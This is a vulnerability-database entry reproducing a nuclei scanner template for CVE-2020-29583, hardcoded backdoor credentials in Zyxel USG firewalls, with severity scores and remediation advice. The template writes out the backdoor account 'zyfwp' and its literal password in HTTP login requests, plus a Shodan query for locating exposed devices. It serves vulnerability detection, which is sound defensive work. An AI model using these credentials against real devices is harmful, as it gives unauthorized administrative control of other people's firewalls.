nuclei (ProjectDiscovery) - NUCLEI:CVE-2020-29583

ZyXel USG - Hardcoded Credentials

Published: 2023-05-25 18:18:57
Source: ProjectDiscovery, github.com
10

CVSS3: 9.8 High
  Attack Vector:          NETWORK
  Attack Complexity:      LOW
  Privileges Required:    NONE
  User Interaction:       NONE
  Scope:                  UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact:       HIGH
  Availability Impact:    HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.5 High (Confidence: High)

CVSS2: 10 High
  Access Vector:          NETWORK
  Access Complexity:      LOW
  Authentication:         NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact:       COMPLETE
  Availability Impact:    COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.962 High (Percentile: 99.5%)

A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.

id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
  remediation: |
    Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
    - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
    epss-score: 0.96219
    epss-percentile: 0.99483
    cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zyxel
    product: usg20-vpn_firmware
    shodan-query: title:"USG FLEX 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration"></a>'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950
